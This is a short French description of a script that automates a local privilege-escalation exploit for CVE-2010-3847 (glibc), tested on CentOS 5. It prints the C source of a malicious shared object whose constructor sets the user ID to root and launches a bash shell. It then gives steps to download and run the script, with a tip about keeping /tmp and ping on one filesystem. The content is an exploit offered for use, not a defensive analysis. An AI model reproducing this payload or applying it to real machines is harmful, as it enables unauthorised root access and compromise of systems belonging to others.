
Script pour exploiter CVE-2010-3847
Destiné à automatiser l'exploit décrit dans [http://marc.info/?l=full-disclosure&m=128776663124692&w=2]. Testé sur CentOS 5 x86.
Le DSO qu'il produit est compilé à partir du code suivant :
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
Téléchargez-le, placez-le quelque part d'exécutable, puis lancez-le.
/tmp et l'emplacement de ping doivent se trouver sur le même système de fichiers. Sinon, ajustez les chemins en conséquence.